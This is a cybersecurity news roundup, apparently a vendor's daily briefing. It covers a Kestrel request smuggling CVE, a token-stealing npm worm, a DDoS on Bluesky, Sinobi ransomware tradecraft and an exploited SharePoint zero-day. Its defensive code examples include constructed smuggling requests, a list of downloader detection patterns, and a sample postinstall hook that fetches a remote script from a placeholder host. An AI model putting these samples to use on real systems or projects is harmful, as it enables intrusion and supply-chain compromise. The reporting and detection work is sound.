Trending Topics

TRENDING TOPICS APR 22, 2026

ASP NET Core Critical Vulnerability: When Request Smuggling Becomes a Security Feature Bypass

Microsoft has patched a maximum-severity vulnerability in ASP[.]NET Core, tracked as CVE-2025-55315, that allows HTTP request smuggling via the built-in Kestrel web server. With a CVSS score of 9.9 out of 10, Microsoft calls it one of its highest-rated issues because, in the worst case, it becomes a security feature bypass that changes scope, letting a lower-privileged request effectively masquerade as a higher-privileged one. The bug arises from inconsistent interpretation of HTTP requests between Kestrel and upstream components, especially when headers like Content-Length and Transfer-Encoding are involved, allowing an attacker to smuggle a second request inside the first. For example, a public unauthenticated request can carry a hidden GET /admin request that slips past normal authentication and authorization checks if the application and any proxies do not consistently enforce message boundaries. The issue affects ASP[.]NET Core 8.0, 9.0, and 10.0, and the Kestrel package on 2.x. Microsoft notes that there are no general mitigating factors for the request smuggling scenario beyond patching. The actual impact depends heavily on how an application processes requests, but Microsoft and independent researchers warn that unpatched systems could be open to privilege escalation, server-side request forgery, cross-site request forgery bypass, and input validation bypass, all stemming from poisoned assumptions about which user or session a given request belongs to. Confusion around .NET 6 has also surfaced because Microsoft does not issue CVEs for end-of-life releases, yet analysis indicates that .NET 6-based apps using affected Kestrel builds remain vulnerable and require third-party or package-level fixes.
To remediate, Microsoft urges developers to update to the patched ASP[.]NET Core runtime and SDK versions 8, 9, or 10, or, at a minimum, to upgrade Microsoft[.]AspNetCore[.]Server[.]Kestrel[.]Core to version 2.3.6 or later, then redeploy their applications. Teams should also review and harden any reverse proxies or load balancers in front of Kestrel, ensuring they normalize HTTP requests and reject or flag smuggling attempts rather than passing ambiguous traffic through. For security engineers, it is important to pay close attention to code that uses HttpRequest[.]Body, HttpRequest[.]BodyReader or similar mechanisms, since these are the points where smuggled data may be processed in unexpected ways. Microsoft and community researchers have released test tools and sample apps that reproduce chunked transfer and newline parsing edge cases, so teams can verify whether their builds and configurations are affected, and then validate that defenses still hold after patching.
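The proxy-side normalization step described above, as an added example that is not code from the article or from Microsoft: a framing check that refuses to forward a raw HTTP/1.1 request whose body length is ambiguous (conflicting Content-Length and Transfer-Encoding, padded or non-standard header forms, bare LF line endings). It assumes the proxy can see the raw request bytes before Kestrel does; the sample requests are constructed, and patching Kestrel is still required.

```javascript
// Added example (not code from the article or from Microsoft): a framing check a
// reverse proxy or test harness can run on a raw HTTP/1.1 request before it is
// forwarded to Kestrel. It rejects the ambiguities request smuggling depends on;
// RFC 9112 section 6.3 says a message carrying both Content-Length and
// Transfer-Encoding must not be forwarded unchanged. Patching Kestrel is still required.
const CRLF = "\r\n";

function parseHead(raw) {
  const end = raw.indexOf(CRLF + CRLF);
  const head = end === -1 ? raw : raw.slice(0, end);
  const [requestLine, ...lines] = head.split(CRLF);
  const headers = lines.map((line) => {
    const i = line.indexOf(":");
    if (i === -1) return { rawName: line, name: "", rawValue: "", value: "", malformed: true };
    const rawName = line.slice(0, i), rawValue = line.slice(i + 1);
    return { rawName, name: rawName.trim().toLowerCase(), rawValue, value: rawValue.trim(), malformed: false };
  });
  return { requestLine, head, headers };
}

// Returns the reasons a request is ambiguous; an empty list means it is safe to forward.
function framingProblems(raw) {
  const { head, headers } = parseHead(raw);
  const problems = [];
  const cl = headers.filter((h) => h.name === "content-length");
  const te = headers.filter((h) => h.name === "transfer-encoding");
  if (cl.length > 0 && te.length > 0) problems.push("both Content-Length and Transfer-Encoding present");
  if (cl.length > 1) problems.push("multiple Content-Length headers");
  for (const h of cl) if (!/^\d+$/.test(h.value)) problems.push(`non-numeric Content-Length "${h.value}"`);
  // Only the exact form "Transfer-Encoding: chunked" is unambiguous; padding, case variants
  // and extra codings are what different servers interpret differently.
  for (const h of te) if (h.rawValue !== " chunked") problems.push(`unusual Transfer-Encoding "${h.rawValue}"`);
  for (const h of headers) {
    if (h.malformed) problems.push(`malformed header line "${h.rawName}"`);
    else if (h.rawName !== h.rawName.trim()) problems.push(`whitespace around header name "${h.rawName}"`);
  }
  if (/(^|[^\r])\n/.test(head)) problems.push("bare LF line ending in header block");
  if (/\r\n[ \t]/.test(head)) problems.push("obsolete line folding");
  return problems;
}

// Constructed sample requests (not captured traffic).
const cleanRequest = "POST /api/orders HTTP/1.1\r\nHost: shop.example\r\nContent-Length: 5\r\n\r\nhello";
const dualFraming = "POST /api/orders HTTP/1.1\r\nHost: shop.example\r\nContent-Length: 5\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n";
const paddedName = "POST /api/orders HTTP/1.1\r\nHost: shop.example\r\nTransfer-Encoding : chunked\r\n\r\n0\r\n\r\n";

for (const r of [cleanRequest, dualFraming, paddedName]) console.log(framingProblems(r));
```

A proxy that returns 400 whenever the list is non-empty never has to guess which framing the backend will pick, which is the assumption the smuggling scenario exploits.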

Self-Spreading npm Attack: Malicious Packages Steal GitHub Tokens and Rewrite Your Own Projects

A newly reported npm supply chain campaign is abusing malicious JavaScript packages that not only steal GitHub and CI/CD auth tokens but also self-propagate by silently injecting themselves into other projects and repositories you work on. The attack uses packages that look like normal utilities or helpers. Once installed, they run code during npm lifecycle hooks (preinstall or postinstall), fetch a remote payload, and begin harvesting secrets and modifying local repositories without any additional action from the developer. Researchers assess that the malware performs extensive environment reconnaissance. It searches for GitHub access tokens, npm tokens, CI/CD variables, and other authentication secrets stored in files, environment variables, or config directories, then exfiltrates them to attacker-controlled servers over HTTP POST or WebSocket connections. With those tokens, the actors can clone private repositories, create new branches, and push malicious changes or workflows back to GitHub, turning the victim’s own projects into new infection vectors for teammates, customers, or downstream users. Some campaigns also add additional malicious dependencies into package[.]json so that other developers who run npm install automatically pull in and execute the same payload, which is why researchers describe it as self-spreading inside the npm ecosystem. For developers and teams, this means treating any new or little-known npm dependency as a potential supply chain risk. Defenses should include pinning dependencies, using tools that scan for known malicious packages and suspicious install scripts, and reviewing package[.]json and package-lock[.]json diffs carefully, especially in pull requests. On the credential side, move to short-lived, scoped tokens; avoid storing tokens unencrypted on developer machines; and monitor for unusual GitHub activity, such as unexpected new branches, commits from unfamiliar IPs, or changes to workflow files. 
If you suspect exposure, immediately revoke GitHub and npm tokens, rotate CI/CD secrets, and audit your repos for unauthorized code or workflow modifications, since the real damage is not only local compromise but the silent corruption of the software you ship to others.
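The package.json review step recommended above, as an added example that is not code from the article or from the researchers it cites: a pre-merge check that diffs the dependency sets of the base and PR versions of package.json and inspects every npm lifecycle hook for downloader-like commands. The package contents and the "string-utils-helper" package name are constructed for the example; the heuristics are assumptions to tune to your own baseline.

```javascript
// Added example (not code from the article or from the researchers it cites): a
// pre-merge check over the base and PR versions of package.json that reports newly
// added or re-pinned dependencies and any lifecycle hook whose command looks like a
// downloader, the two things the campaign described above relies on.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare", "prepublish"];

// Heuristics for hook commands that fetch, decode or spawn something; tune them to your baseline.
const DOWNLOADER_PATTERNS = [
  /\b(curl|wget)\b/i, /https?:\/\//i, /\bnode\s+-e\b/i, /\b(eval|Function)\s*\(/,
  /base64/i, /child_process|execSync|spawn\s*\(/, /powershell|cmd\.exe|\/bin\/sh/i,
];
function suspiciousScripts(pkg) {
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    const hits = DOWNLOADER_PATTERNS.filter((re) => re.test(cmd)).map((re) => re.source);
    findings.push({ hook, cmd, suspicious: hits.length > 0, hits });
  }
  return findings;
}

// Dependencies the PR introduces or re-pins relative to the base branch.
function allDeps(pkg) {
  return { ...(pkg.dependencies || {}), ...(pkg.devDependencies || {}), ...(pkg.optionalDependencies || {}) };
}
function diffDependencies(basePkg, prPkg) {
  const a = allDeps(basePkg), b = allDeps(prPkg);
  const added = Object.keys(b).filter((n) => !(n in a)).map((n) => ({ name: n, spec: b[n] }));
  const changed = Object.keys(b).filter((n) => n in a && a[n] !== b[n]).map((n) => ({ name: n, from: a[n], to: b[n] }));
  return { added, changed };
}

// Verdict: block the merge (pending human review) when the PR adds a dependency or carries a suspicious hook.
function reviewPullRequest(basePkg, prPkg) {
  const deps = diffDependencies(basePkg, prPkg);
  const suspiciousHooks = suspiciousScripts(prPkg).filter((f) => f.suspicious);
  return { ...deps, suspiciousHooks, block: deps.added.length > 0 || suspiciousHooks.length > 0 };
}

// Constructed sample: a PR that adds a "helper" package and a postinstall hook that pulls a remote script.
const basePkg = { name: "shop-api", dependencies: { express: "4.19.2" }, scripts: { test: "jest" } };
const prPkg = {
  name: "shop-api",
  dependencies: { express: "4.19.2", "string-utils-helper": "^1.0.3" },
  scripts: { test: "jest", postinstall: "node -e \"require('https').get('https://example.invalid/s.js')\"" },
};
console.log(JSON.stringify(reviewPullRequest(basePkg, prPkg), null, 2));
```

The same diff should be run against package-lock.json, where a transitive dependency can be added without touching package.json at all.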

Bluesky Back Online After DDoS Barrage, as Pro-Iran “313 Team” Claims the Hit

Bluesky, the decentralized social network positioned as an alternative to Twitter/X, spent roughly a day dealing with outages after a DDoS attack knocked core features offline. The disruption began late on April 15, 2026, when users saw feeds stop refreshing around 11:40 p.m. PDT and, by the following morning, notifications, search, and thread loading were all failing, leaving the platform effectively unusable for many. Bluesky later confirmed that its API, which ferries data between user devices and the backend, was being flooded with junk traffic to “jam the lines”, describing the incident as a “sophisticated DDoS attack” but emphasizing that there was no evidence of unauthorized access to private user data. By April 20, the company reported that the app had returned to a stable state after its security team contained repeated attempts by attackers to relaunch the flood. While Bluesky stopped short of naming a culprit, a pro-Iran hacktivist group known as 313 Team, also called the Islamic Cyber Resistance in Iraq, quickly claimed responsibility on Telegram and other channels. The group, which has a recent history of politically motivated DDoS and website disruption campaigns against targets it associates with the United States, Israel, and allied states, boasted that it had taken Bluesky down, and days later announced a follow-up hit on mastodon[.]social, which saw more limited impact thanks to its federated, distributed hosting model. Analysts note that 313 Team tends to chase visibility rather than deep intrusion, favoring short burst outages, screenshots, and claims of disruption over data theft, and that it has recently targeted government services in Bahrain using similar tactics. For Bluesky’s more than 43 million users, the key reassurance is that this attack was about availability, not data compromise. 
DDoS operations work by overwhelming public-facing services with traffic, not by breaking into databases, and Bluesky has reiterated that its monitoring has not found signs of private data exposure. At the same time, the incident underlines how social platforms and other high-profile public services are now regular fixtures in geopolitical cyber signaling, where groups like 313 Team can generate headlines and amplify narratives simply by knocking popular apps offline for a few hours. For defenders running similar platforms or APIs, this trend reinforces the need for robust DDoS mitigation, scalable API protection, and clear public communication plans, so that when traffic floods arrive, teams can keep services afloat and quickly reassure users about what was and was not affected.

Sinobi Ransomware: Exclusive RaaS Group With Nation State Style Tradecraft

Sinobi is a hybrid, semi-private RaaS operation that emerged in mid-2025 and has quickly built a reputation for quiet, high-impact intrusions against midsize and large organizations, mainly in the United States and allied countries. Instead of opening sign-ups on underground forums, the core operators work only with vetted, well-connected affiliates, many of whom already have access routes through initial access brokers, compromised managed service providers, or existing VPN/firewall exploits such as SonicWall SSL VPN vulnerabilities. Technically, Sinobi appears to be a direct successor or rebrand of the Lynx ransomware group, itself linked to earlier INC ransomware, and it uses a Babuk-derived cryptographic scheme combining Curve25519 key exchange with AES-128-CTR, which makes recovery without the attackers’ private key practically impossible. Once inside a victim network, Sinobi runs a hands-on-keyboard attack chain that looks closer to high-end intrusion sets than commodity ransomware. Affiliates start with privilege escalation and security evasion, creating or hijacking local admin and domain accounts, disabling endpoint protection and logging, and establishing persistence through legitimate remote access tools. They then perform automated and manual reconnaissance to map domains, file shares, privileged accounts, endpoint security products, and, sometimes, USB devices, suggesting at least some interest in removable media-based propagation. Lateral movement relies heavily on RDP, SMB, and DCOM, using valid or newly created credentials and extensive living-off-the-land activity, which helps Sinobi blend into normal administrative traffic and delay detection until the environment is fully staged for impact. Like most modern big-game operations, Sinobi uses double extortion, exfiltrating data before encrypting systems.
Affiliates typically deploy tools such as Rclone, WinSCP, or other secure file transfer clients to move large volumes of documents, databases, email archives, backups, and regulated records to attacker-controlled cloud storage or Tor infrastructure, prioritizing information that increases leverage, such as customer data and intellectual property. Only after exfiltration do they execute the Sinobi encryptor, usually during off-hours, appending a “.SINOBI”-style extension, deleting shadow copies and backups, terminating critical services, changing desktop wallpapers, and dropping a README-style ransom note with a Tor negotiation portal and a short payment deadline. Public casework and leak site data suggest that Sinobi has already impacted dozens of organizations across sectors such as accounting, manufacturing, and professional services, and that the group is more interested in fewer, higher-value intrusions than mass opportunistic campaigns. Sinobi is a reminder that professionalized RaaS crews now operate at maturity levels that resemble those of advanced intrusion groups, not smash-and-grab criminals. Effective mitigation starts with hardening remote access and third-party relationships: strict patching and monitoring of VPNs and edge appliances, enforcing phishing-resistant MFA, and scrutinizing MSP and vendor connectivity, since those pathways have already been abused in documented cases. Inside the network, focus on credential hygiene and segmentation, restrict and monitor RDP and SMB traffic, and deploy EDR and logging tuned to detect living-off-the-land behavior, new admin account creation, Rclone or WinSCP use, and unusual data egress to cloud storage. Finally, ensure you have tested backup and recovery processes that are isolated from domain credentials and can survive shadow copy deletion, so that when a group like Sinobi does get in, you are negotiating from a position of resilience rather than desperation.

Update: Over 1,300 SharePoint Servers Still Exposed to an Actively Exploited Spoofing Zero Day

Security scans show that more than 1,300 internet-exposed Microsoft SharePoint servers remain unpatched for CVE-2026-32201, a spoofing vulnerability that Microsoft has confirmed was exploited as a zero-day and is still being abused in current attacks. The flaw affects SharePoint Enterprise Server 2016, SharePoint Server 2019, and SharePoint Server Subscription Edition, and stems from improper input validation that allows an unauthenticated attacker to perform network-level spoofing in low-complexity attacks that do not require user interaction. Successful exploitation allows an unprivileged attacker to view sensitive information and modify disclosed data, undermining the confidentiality and integrity of SharePoint content and workflows, even though availability is not directly affected. Microsoft patched CVE-2026-32201 in the April 2026 Patch Tuesday release and immediately labeled it a zero-day, but has so far not shared technical exploit details or attributed it to a specific threat group. On the same day, CISA added the bug to its KEV catalog and ordered U.S. Federal Civilian Executive Branch agencies to patch all affected SharePoint servers within two weeks, by April 28, under Binding Operational Directive 22-01. Despite this, data from the Shadowserver Foundation shows that since the patches dropped, fewer than 200 servers have been updated, leaving the majority of known exposed instances still vulnerable on the public internet and providing attackers with a stable, well-understood target set. For organizations running on-premises SharePoint, the guidance is clear and urgent. Admins should identify all externally reachable SharePoint 2016, 2019, and Subscription Edition servers, apply the April 2026 security updates that include the CVE-2026-32201 fix, and, where possible, remove SharePoint from direct internet exposure by placing it behind VPN or reverse proxy layers.
Security teams should also monitor for suspicious SharePoint traffic and access patterns, cross-check their environment against CISA’s KEV listing, and verify that any third-party-managed SharePoint instances have been patched in accordance with guidance. Given the history of SharePoint bugs being chained with other vulnerabilities for code execution and key theft, leaving CVE-2026-32201 unpatched does not just risk spoofing on a single site; it leaves a foothold that can be combined with other flaws to compromise broader Microsoft 365 integrated environments.

Hunter Strategy encourages our readers to look for updates in our daily Trending Topics.

Written By: William Elchert